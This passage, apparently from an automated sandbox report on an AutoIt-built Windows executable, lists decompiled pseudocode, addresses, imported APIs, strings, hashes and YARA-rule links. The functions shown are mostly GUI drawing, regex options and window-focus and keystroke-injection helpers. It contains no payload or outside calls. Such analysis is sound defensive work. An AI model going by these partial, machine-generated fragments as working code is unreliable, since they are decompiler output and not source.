						_t372 = E00420FF6(_t280, SendMessageW, __eflags,  ~(0 | __eflags > 0x00000000) | (_t267 + 0x00000001) * _t348);
						_push(_t372);
						_push(_t280);
						_push(0x148);
						L12:
						SendMessageW(_a8, ??, ??, ??);
						goto L13;
					}
					_t272 = _t265 - 1;
					__eflags = _t272;
					if(_t272 == 0) {
						_t280 = SendMessageW(_t368, 0x188, 0, 0);
						__eflags = _t280 - 0xffffffff;
						if(__eflags == 0) {
							goto L72;
						} else {
							_t274 = SendMessageW(_t368, 0x18a, _t280, 0);
							_t350 = 2;
							_t336 =  ~(__eflags > 0) | (_t274 + 0x00000001) * _t350;
							_t372 = E00420FF6(_t280, SendMessageW,  ~(__eflags > 0) | (_t274 + 0x00000001) * _t350, _t336);
							_push(_t372);
							_push(_t280);
							_push(0x189);
							goto L12;
						}
					}
					__eflags = _t272 - 7;
					if(__eflags != 0) {
						goto L72;
					} else {
						_push(0);
						_push(0);
						_push(0x408);
						goto L88;
					}
				} else {
					 *_a8 =  *_a8 & 0x00000000;
					L90:
					return 0;
				}
			}

0x0048806d
0x0048807f
0x00488084
0x0048808a
0x0048808d
0x0048808f
0x00488092
0x00488099
0x0048809b
0x0048809e
0x004880a1
0x0048840e
0x00488411
0x00488735
0x00488737
0x00488738
0x00488739
0x0048873e
0x0048873f
0x00488745
0x00488745
0x00000000
0x00488745
0x00488417
0x0048841a
0x00488700
0x00488709
0x00488713
0x00488719
0x0048872a
0x0048872e
0x00488730
0x00000000
0x00488730
0x00488420
0x00488423
0x004885a3
0x004885b3
0x004885bd
0x004885c8
0x004885cb
0x004885d7
0x004885ec
0x004885f2
0x004885f5
0x004885f8
0x00000000
0x00000000
0x004885fe
0x00488602
0x00488649
0x00488653
0x00488655
0x0048865d
0x0048865f
0x00488668
0x0048866b
0x00488672
0x004886c9
0x004886c9
0x004886cc
0x004886d2
0x004886d3
0x004886d4
0x004886d9
0x004886dc
0x004886df
0x00000000
0x00000000
0x00488676
0x0048867f
0x0048868c
0x0048868f
0x00488691
0x00488238
0x00000000
0x00488238
0x0048869e
0x004886a1
0x004886a7
0x004886ad
0x004886b1
0x004886be
0x004886c0
0x004886c6
0x004886c7
0x004886c7
0x004886e1
0x00000000
0x004886e1
0x00488604
0x00488608
0x00000000
0x00000000
0x0048860d
0x0048861e
0x00488625
0x0048862b
0x0048862d
0x00000000
0x00000000
0x0048863c
0x00488641
0x00000000
0x00488641
0x00488429
0x0048842c
0x0048853c
0x00488540
0x00488599
0x00000000
0x00488599
0x00488542
0x00488547
0x00488553
0x0048856a
0x00488579
0x00488589
0x00000000
0x0048858f
0x00488432
0x00488435
0x00488505
0x0048850a
0x00488514
0x00488515
0x00488515
0x0048852b
0x00488531
0x00488125
0x00000000
0x00488125
0x0048843b
0x0048843e
0x00488495
0x00488499
0x0048849a
0x0048849b
0x004884ea
0x004884f0
0x004884f2
0x004884f4
0x004884fa
0x004884fa
0x00000000
0x004884f4
0x004884a0
0x004884aa
0x004884ab
0x004884ab
0x004884ba
0x004884c5
0x004884c8
0x004884ce
0x004884d0
0x00000000
0x004884dc
0x004884d2
0x004884d5
0x00488240
0x00488240
0x00000000
0x00488245
0x00488440
0x00488443
0x00000000
0x00000000
0x0048845c
0x0048845e
0x0048848c
0x00000000
0x0048848c
0x0048846b
0x0048847e
0x00000000
0x00488484
0x004880a7
0x00488367
0x0048836a
0x0048836c
0x00488372
0x00488376
0x00488379
0x00488380
0x00488387
0x004883bb
0x004883c1
0x004883c3
0x004883c9
0x004883d1
0x004883d4
0x004883de
0x004883e3
0x004883e3
0x004883e6
0x004883e6
0x004883e8
0x004883eb
0x004883ed
0x004883ed
0x004883ed
0x004883ef
0x004883f2
0x004883f4
0x004883f4
0x004883f4
0x004883fa
0x004883fd
0x00488403
0x00488403
0x004883fd
0x00000000
0x004883c3
0x00488396
0x0048839c
0x0048839d
0x0048839e
0x004883a3
0x0048821d
0x0048821d
0x00488224
0x00488227
0x0048822e
0x00488234
0x00488236
0x0048823f
0x00000000
0x0048823f
0x00000000
0x00488236
0x004880ad
0x004880b0
0x004881b6
0x004881b9
0x00488356
0x00000000
0x00488356
0x004881bf
0x004881c2
0x00000000
0x00000000
0x004881c8
0x004881cb
0x00488275
0x00488277
0x00000000
0x00000000
0x00488282
0x00488287
0x0048828b
0x0048828d
0x00488297
0x0048829a
0x004882a4
0x004882a5
0x004882eb
0x004882f8
0x004882fe
0x004882ff
0x00488301
0x00000000
0x00000000
0x00488307
0x0048830d
0x00488317
0x0048831e
0x00488323
0x00488326
0x0048832c
0x0048832e
0x0048832e
0x0048832e
0x00488333
0x00488336
0x0048833d
0x0048833d
0x00488338
0x00488338
0x00488338
0x00488340
0x00488346
0x0048834c
0x0048834c
0x00000000
0x00488346
0x004882a7
0x004882b3
0x004882c0
0x004882ca
0x004882d0
0x004882d2
0x00000000
0x004882de
0x004882d4
0x004882d7
0x00000000
0x004882d7
0x004881d1
0x004881d4
0x00000000
0x00000000
0x004881e5
0x004881e7
0x004881ed
0x004881ef
0x00000000
0x00000000
0x004881f5
0x004881f9
0x004881fc
0x00488203
0x00488256
0x0048825c
0x0048825e
0x00000000
0x00000000
0x00488264
0x00000000
0x00488264
0x00488210
0x00488215
0x00488216
0x00488217
0x0048821c
0x00000000
0x0048821c
0x004880b6
0x00488186
0x00488188
0x0048818c
0x0048818e
0x00000000
0x00000000
0x0048819a
0x004881ac
0x004881ae
0x00000000
0x004881ae
0x004880bc
0x004880bc
0x004880be
0x0048813a
0x0048813c
0x0048813f
0x00000000
0x00000000
0x00488153
0x0048815a
0x0048816b
0x0048816d
0x0048816e
0x0048816f
0x00488120
0x00488123
0x00000000
0x00488123
0x004880c0
0x004880c0
0x004880c1
0x004880e6
0x004880e8
0x004880eb
0x00000000
0x004880f1
0x004880ff
0x00488106
0x0048810e
0x00488117
0x00488119
0x0048811a
0x0048811b
0x00000000
0x0048811b
0x004880eb
0x004880c3
0x004880c6
0x00000000
0x004880cc
0x004880cc
0x004880cd
0x004880ce
0x00000000
0x004880ce
0x0048806f
0x00488072
0x00488747
0x00000000
0x00488747

APIs

SendMessageW.USER32(?,00000400,00000000,00000000), ref: 0048873F

Strings

%d/%02d/%02d, xrefs: 00488478

Memory Dump Source

Source File: 00000000.00000002.610070755.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.610057645.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610303192.000000000048F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610341432.00000000004B5000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610359460.00000000004BF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.610387011.00000000004C8000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend
String ID: %d/%02d/%02d
API String ID: 3850602802-328681919
Opcode ID: ae87787b25494f75a8735eebec2b66a330028242162c9b3dd3efd15478c42a32
Instruction ID: 36cb0aac88b98b8da02c5ab338f868b1959a7ece2bc6b86039ddf895eacba2ba
Opcode Fuzzy Hash: ae87787b25494f75a8735eebec2b66a330028242162c9b3dd3efd15478c42a32
Instruction Fuzzy Hash: 1112F371500214ABEB24AF24CC49FAF7BB4EF45710F60492EF915EA2E1EF788941CB18

Uniqueness

Uniqueness Score: -1.00%

Function 0041710E, Relevance: 50.6, APIs: 19, Strings: 7, Instructions: 5093COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 004175C2
_memset.LIBCMT ref: 004176B1
_memmove.LIBCMT ref: 00417C4B
_memmove.LIBCMT ref: 00417E4F

Strings

\b(?=\w), xrefs: 00453C34
\b(?<=\w), xrefs: 00453C41
DEFINE, xrefs: 004525AF
0wK, xrefs: 00451F5B
Q\E, xrefs: 004181C1
[:<:]], xrefs: 004175F1
[:>:]], xrefs: 0041760A

Memory Dump Source

Source File: 00000000.00000002.610070755.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.610057645.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610303192.000000000048F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610341432.00000000004B5000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610359460.00000000004BF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.610387011.00000000004C8000.00000002.00020000.sdmp Download File

Similarity

API ID: _memmove$_memset
String ID: 0wK$DEFINE$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)
API String ID: 1357608183-3634101460
Opcode ID: ce09b7ae3f1f3eb577794364a1e258ca6c0e99c45195fa8c790f52c04ac44792
Instruction ID: 0f2016292ce7af36af0f0c3c89fa088be26185f2ba7aa12bc90a9d7b287e4a4c
Opcode Fuzzy Hash: ce09b7ae3f1f3eb577794364a1e258ca6c0e99c45195fa8c790f52c04ac44792
Instruction Fuzzy Hash: 2C93A371A002199BDB24CF58C8817EEB7B1FF48715F24816BED45AB381E7789D86CB48

Uniqueness

Uniqueness Score: -1.00%

Function 00404A35, Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 131keyboardthreadwindowCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(00000000,?), ref: 00404A3D
FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0043DA8E
IsIconic.USER32(?), ref: 0043DA97
ShowWindow.USER32(?,00000009), ref: 0043DAA4
SetForegroundWindow.USER32(?), ref: 0043DAAE
GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0043DAC4
GetCurrentThreadId.KERNEL32 ref: 0043DACB
GetWindowThreadProcessId.USER32(?,00000000), ref: 0043DAD7
AttachThreadInput.USER32(?,00000000,00000001), ref: 0043DAE8
AttachThreadInput.USER32(?,00000000,00000001), ref: 0043DAF0
AttachThreadInput.USER32(00000000,?,00000001), ref: 0043DAF8
SetForegroundWindow.USER32(?), ref: 0043DAFB
MapVirtualKeyW.USER32(00000012,00000000), ref: 0043DB10
keybd_event.USER32(00000012,00000000), ref: 0043DB1B
MapVirtualKeyW.USER32(00000012,00000000), ref: 0043DB25
keybd_event.USER32(00000012,00000000), ref: 0043DB2A
MapVirtualKeyW.USER32(00000012,00000000), ref: 0043DB33
keybd_event.USER32(00000012,00000000), ref: 0043DB38
MapVirtualKeyW.USER32(00000012,00000000), ref: 0043DB42
keybd_event.USER32(00000012,00000000), ref: 0043DB47
SetForegroundWindow.USER32(?), ref: 0043DB4A
AttachThreadInput.USER32(?,?,00000000), ref: 0043DB71

Strings

Shell_TrayWnd, xrefs: 0043DA89

Memory Dump Source

Source File: 00000000.00000002.610070755.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.610057645.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610303192.000000000048F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610341432.00000000004B5000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610359460.00000000004BF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.610387011.00000000004C8000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
String ID: Shell_TrayWnd
API String ID: 4125248594-2988720461
Opcode ID: f79b4016a452e3713d3f296b67be0db1888c659ea2cd4af33083302438d8d314
Instruction ID: e7c85a06078abd95958a76b560472cb4de1ee0cbe7850f23b5b82bf1a514fd8d
Opcode Fuzzy Hash: f79b4016a452e3713d3f296b67be0db1888c659ea2cd4af33083302438d8d314
Instruction Fuzzy Hash: 5A31A571E40318BBEB206F619C49F7F7E6CEB48B50F11403AFA00E61D1D6B45D11ABA9

Uniqueness

Uniqueness Score: -1.00%

Function 00416843, Relevance: 19.6, Strings: 15, Instructions: 883COMMON

Download Yara Rule

Strings

PJJ, xrefs: 004168B3
LF), xrefs: 004516DD
UTF), xrefs: 00451533
UCP), xrefs: 00451546
NO_AUTO_POSSESS), xrefs: 00451567
BSR_ANYCRLF), xrefs: 00451757
LIMIT_MATCH=, xrefs: 004515A9
ANYCRLF), xrefs: 00451734
LIMIT_RECURSION=, xrefs: 00451635
BSR_UNICODE), xrefs: 00451771
CRLF), xrefs: 004516FA
ANY), xrefs: 00451717
NO_START_OPT), xrefs: 00451588
UTF16), xrefs: 00451508
CR), xrefs: 004516C0

Memory Dump Source

Source File: 00000000.00000002.610070755.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.610057645.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610303192.000000000048F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610341432.00000000004B5000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610359460.00000000004BF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.610387011.00000000004C8000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$PJJ$UCP)$UTF)$UTF16)
API String ID: 0-690650367
Opcode ID: 9f56f4a328962fb90a34fc3a88c96b69726f9e3444872868eefc29649ad329b2
Instruction ID: 3784516a1003e1c275ce3f2ff5430e7d36dc90e0b9f0d34c2957a4bb797dab3e
Opcode Fuzzy Hash: 9f56f4a328962fb90a34fc3a88c96b69726f9e3444872868eefc29649ad329b2
Instruction Fuzzy Hash: 8B72AE71E002199BDB24CF59C8807EEB7B5EF48310F15806BE849EB391E7789D85CB99

Uniqueness

Uniqueness Score: -1.00%

Function 00401287, Relevance: 7.9, APIs: 5, Instructions: 379COMMON

Download Yara Rule

APIs

Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623

DefDlgProcW.USER32(?,?,?,?,?), ref: 004019FA
GetSysColor.USER32(0000000F), ref: 00401A4E
SetBkColor.GDI32(?,00000000), ref: 00401A61

Part of subcall function 00401290: DefDlgProcW.USER32(?,00000020,?), ref: 004012D8

Memory Dump Source

Source File: 00000000.00000002.610070755.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.610057645.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610303192.000000000048F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610341432.00000000004B5000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610359460.00000000004BF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.610387011.00000000004C8000.00000002.00020000.sdmp Download File

Similarity

API ID: ColorProc$LongWindow
String ID:
API String ID: 3744519093-0
Opcode ID: b8edf29c0d695a1c275d32316306b2180ebc86198bca698258bcbce8654cd126
Instruction ID: 7331066d687c79144e479fa77cb5b53127ed0084e9ebbd02b0941197b1da37a7
Opcode Fuzzy Hash: b8edf29c0d695a1c275d32316306b2180ebc86198bca698258bcbce8654cd126
Instruction Fuzzy Hash: D9A13670202444BAE639AA6A4C88E7F355CDB85345F14453FF502F62F2CA3C9D0296BE

Uniqueness

Uniqueness Score: -1.00%

Function 00402344, Relevance: 7.6, APIs: 5, Instructions: 111keyboardCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00402357
ScreenToClient.USER32(004C67B0,?), ref: 00402374
GetAsyncKeyState.USER32(00000001), ref: 00402399
GetAsyncKeyState.USER32(00000002), ref: 004023A7

Memory Dump Source

Source File: 00000000.00000002.610070755.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.610057645.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610303192.000000000048F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610341432.00000000004B5000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610359460.00000000004BF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.610387011.00000000004C8000.00000002.00020000.sdmp Download File

Similarity

API ID: AsyncState$ClientCursorScreen
String ID:
API String ID: 4210589936-0
Opcode ID: aa170e235bd8e8c3be7ecfcb621341bfa51620c775f10e523610c288c0923c33
Instruction ID: 2447c90426a38808cbef6312e0f9f8f6ce7d60f79d30bdc6c495824b4ec10740
Opcode Fuzzy Hash: aa170e235bd8e8c3be7ecfcb621341bfa51620c775f10e523610c288c0923c33
Instruction Fuzzy Hash: 2A416031904119FBDF159F65C888AEEBB74FB09324F20436BF824A22D0C7785954DF99

Uniqueness

Uniqueness Score: -1.00%

Function 00404D61, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00404D2E,?,00404F4F,?,004C62F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00404D6F
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00404D81

Strings

Wow64DisableWow64FsRedirection, xrefs: 00404D7B
kernel32.dll, xrefs: 00404D6A

Memory Dump Source

Source File: 00000000.00000002.610070755.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.610057645.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610303192.000000000048F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610341432.00000000004B5000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610359460.00000000004BF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.610387011.00000000004C8000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64DisableWow64FsRedirection$kernel32.dll
API String ID: 2574300362-3689287502
Opcode ID: fc980e23cb8f5420eddcc0b614f2834b55be2bd1e6444ffbd0018dc10b9e249f
Instruction ID: 138340c1bb7cbddbf6dc8479dd470e83836704d62684dbb944a4f44490343f19
Opcode Fuzzy Hash: fc980e23cb8f5420eddcc0b614f2834b55be2bd1e6444ffbd0018dc10b9e249f
Instruction Fuzzy Hash: FED01770610713CFD720AF31D80875A76E8AF55762B218D3FD886E6690E678D8C4CB68

Uniqueness

Uniqueness Score: -1.00%

Function 0046A2D5, Relevance: 3.0, APIs: 2, Instructions: 31windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,0047977D,?,0048FB84,?), ref: 0046A302
FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,0047977D,?,0048FB84,?), ref: 0046A314

Memory Dump Source

Source File: 00000000.00000002.610070755.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.610057645.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610303192.000000000048F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610341432.00000000004B5000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610359460.00000000004BF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.610387011.00000000004C8000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: cd8db5a90eb0c0a36bf5c2b894c03edb3670fcb4382623c52c726041fca15490
Instruction ID: ec260152526798b71ceb7e6cab33189719a1cd8c4d24e489ae92bbfcc79f14b4
Opcode Fuzzy Hash: cd8db5a90eb0c0a36bf5c2b894c03edb3670fcb4382623c52c726041fca15490
Instruction Fuzzy Hash: 1AF0E23154422DABDB109FA4CC48FEA736CBF08361F00416AFC08E6281D6309944CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 0042A395, Relevance: 3.0, APIs: 2, Instructions: 8COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000,?,00428F97,?,?,?,00000001), ref: 0042A39A
UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 0042A3A3

Memory Dump Source

Source File: 00000000.00000002.610070755.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.610057645.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610303192.000000000048F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610341432.00000000004B5000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610359460.00000000004BF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.610387011.00000000004C8000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: c2bfc4d91f5eef072ecd4d4a99461c52a82975f392c39b974fa7ca05b3ef40fa
Instruction ID: 9da78fce3b57c7d2137df8720d13279edd616241823e717daaa40eb201d223bb
Opcode Fuzzy Hash: c2bfc4d91f5eef072ecd4d4a99461c52a82975f392c39b974fa7ca05b3ef40fa
Instruction Fuzzy Hash: CCB09231254308ABCA022B91EC09B8C3F68EB46AA2F404434FA0D84C60CB6254548B99

Uniqueness

Uniqueness Score: -1.00%

Function 00418A0E, Relevance: .6, Instructions: 608COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.610070755.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.610057645.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610303192.000000000048F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610341432.00000000004B5000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610359460.00000000004BF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.610387011.00000000004C8000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f66ab0580a314d221ab9376d4eb50f49803d2a8e394490c5a9382fd7f99d6c8
Instruction ID: 9a981ba99b4911944b9919f44c7759cb7337f05dfe0c326ced162c2a54403da9
Opcode Fuzzy Hash: 4f66ab0580a314d221ab9376d4eb50f49803d2a8e394490c5a9382fd7f99d6c8
Instruction Fuzzy Hash: 47222730505656CBDF288B18C4A46BF77A1EB41311F64446FE8468B392EB3C9DC6CBAD

Uniqueness

Uniqueness Score: -1.00%

Function 014101CB, Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.468417124.0000000001410000.00000040.00000001.sdmp, Offset: 01410000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 325e4268c7570630f6d5181f8aab2dfd9f64724ce909539abfa6e241f72ccfdc
Instruction ID: 8f9cbc796588c6071b24dde067c35358ae5dc82bf67fc4634174802025ff8b8d
Opcode Fuzzy Hash: 325e4268c7570630f6d5181f8aab2dfd9f64724ce909539abfa6e241f72ccfdc
Instruction Fuzzy Hash: 79018172701214DFDB14CF9DC990AAABBF9EF99650B14446AFD06D7364E331ED80C660

Uniqueness

Uniqueness Score: -1.00%

Function 0048A849, Relevance: 49.8, APIs: 33, Instructions: 274COMMON

Download Yara Rule

APIs

SetTextColor.GDI32(?,00000000), ref: 0048A89F
GetSysColorBrush.USER32(0000000F), ref: 0048A8D0
GetSysColor.USER32(0000000F), ref: 0048A8DC
SetBkColor.GDI32(?,000000FF), ref: 0048A8F6
SelectObject.GDI32(?,?), ref: 0048A905
InflateRect.USER32(?,000000FF,000000FF), ref: 0048A930
GetSysColor.USER32(00000010), ref: 0048A938
CreateSolidBrush.GDI32(00000000), ref: 0048A93F
FrameRect.USER32(?,?,00000000), ref: 0048A94E
DeleteObject.GDI32(00000000), ref: 0048A955
InflateRect.USER32(?,000000FE,000000FE), ref: 0048A9A0
FillRect.USER32 ref: 0048A9D2
GetWindowLongW.USER32(?,000000F0), ref: 0048A9FD

Part of subcall function 0048AB60: GetSysColor.USER32(00000012), ref: 0048AB99
Part of subcall function 0048AB60: SetTextColor.GDI32(?,?), ref: 0048AB9D
Part of subcall function 0048AB60: GetSysColorBrush.USER32(0000000F), ref: 0048ABB3
Part of subcall function 0048AB60: GetSysColor.USER32(0000000F), ref: 0048ABBE
Part of subcall function 0048AB60: GetSysColor.USER32(00000011), ref: 0048ABDB
Part of subcall function 0048AB60: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0048ABE9
Part of subcall function 0048AB60: SelectObject.GDI32(?,00000000), ref: 0048ABFA
Part of subcall function 0048AB60: SetBkColor.GDI32(?,00000000), ref: 0048AC03
Part of subcall function 0048AB60: SelectObject.GDI32(?,?), ref: 0048AC10
Part of subcall function 0048AB60: InflateRect.USER32(?,000000FF,000000FF), ref: 0048AC2F
Part of subcall function 0048AB60: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0048AC46
Part of subcall function 0048AB60: GetWindowLongW.USER32(00000000,000000F0), ref: 0048AC5B

Memory Dump Source

Source File: 00000000.00000002.610070755.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.610057645.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610303192.000000000048F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610341432.00000000004B5000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610359460.00000000004BF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.610387011.00000000004C8000.00000002.00020000.sdmp Download File

Similarity

API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
String ID:
API String ID: 4124339563-0
Opcode ID: 682075aae0e093644c02d5f3d88ac75295991df1a9f3b2d1c473df9186b21a8c
Instruction ID: 452232081cd78e43451fe9d0edc745e4d0d3487f89d4aa1c860563aee330a7d3
Opcode Fuzzy Hash: 682075aae0e093644c02d5f3d88ac75295991df1a9f3b2d1c473df9186b21a8c
Instruction Fuzzy Hash: ACA17D72408301BFD710AF64DC08A6F7BA9FB89321F104E3EF962961A1D774D859CB56

Uniqueness

Uniqueness Score: -1.00%

Function 00402C18, Relevance: 49.5, APIs: 27, Strings: 1, Instructions: 486windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?), ref: 00402CA2
DeleteObject.GDI32(00000000), ref: 00402CE8
DeleteObject.GDI32(00000000), ref: 00402CF3
DestroyIcon.USER32(00000000,?,?,?), ref: 00402CFE
DestroyWindow.USER32(00000000,?,?,?), ref: 00402D09
SendMessageW.USER32(?,00001308,?,00000000), ref: 0043C68B
ImageList_Remove.COMCTL32(?,000000FF,?), ref: 0043C6C4
MoveWindow.USER32(?,?,?,?,?,00000000), ref: 0043CAED

Part of subcall function 00401B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00402036,?,00000000,?,?,?,?,004016CB,00000000,?), ref: 00401B9A

SendMessageW.USER32(?,00001053), ref: 0043CB2A
SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 0043CB41
ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0043CB57
ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0043CB62

Strings

0, xrefs: 0043C981

Memory Dump Source

Source File: 00000000.00000002.610070755.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.610057645.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610303192.000000000048F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610341432.00000000004B5000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610359460.00000000004BF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.610387011.00000000004C8000.00000002.00020000.sdmp Download File

Similarity

API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
String ID: 0
API String ID: 464785882-4108050209
Opcode ID: 8bb651e3813426e3b2906523babd31f652832d467135021f94eae9fb0a9951ba
Instruction ID: c5daa602b1da6e2c88f559f2981f7132431180b83a6a7b57709d98132a53226c
Opcode Fuzzy Hash: 8bb651e3813426e3b2906523babd31f652832d467135021f94eae9fb0a9951ba
Instruction Fuzzy Hash: 9D12B030604201EFDB14DF24C988BAAB7E1BF09314F54557EE885EB2A2C779EC42CB59

Uniqueness

Uniqueness Score: -1.00%

Function 0048AB60, Relevance: 39.2, APIs: 26, Instructions: 201windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000012), ref: 0048AB99
SetTextColor.GDI32(?,?), ref: 0048AB9D
GetSysColorBrush.USER32(0000000F), ref: 0048ABB3
GetSysColor.USER32(0000000F), ref: 0048ABBE
CreateSolidBrush.GDI32(?), ref: 0048ABC3
GetSysColor.USER32(00000011), ref: 0048ABDB
CreatePen.GDI32(00000000,00000001,00743C00), ref: 0048ABE9
SelectObject.GDI32(?,00000000), ref: 0048ABFA
SetBkColor.GDI32(?,00000000), ref: 0048AC03
SelectObject.GDI32(?,?), ref: 0048AC10
InflateRect.USER32(?,000000FF,000000FF), ref: 0048AC2F
RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0048AC46
GetWindowLongW.USER32(00000000,000000F0), ref: 0048AC5B
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0048ACA7
GetWindowTextW.USER32 ref: 0048ACCE
InflateRect.USER32(?,000000FD,000000FD), ref: 0048ACEC
DrawFocusRect.USER32(?,?), ref: 0048ACF7
GetSysColor.USER32(00000011), ref: 0048AD05
SetTextColor.GDI32(?,00000000), ref: 0048AD0D
DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0048AD21
SelectObject.GDI32(?,0048A869), ref: 0048AD38
DeleteObject.GDI32(?), ref: 0048AD43
SelectObject.GDI32(?,?), ref: 0048AD49
DeleteObject.GDI32(?), ref: 0048AD4E
SetTextColor.GDI32(?,?), ref: 0048AD54
SetBkColor.GDI32(?,?), ref: 0048AD5E

Memory Dump Source

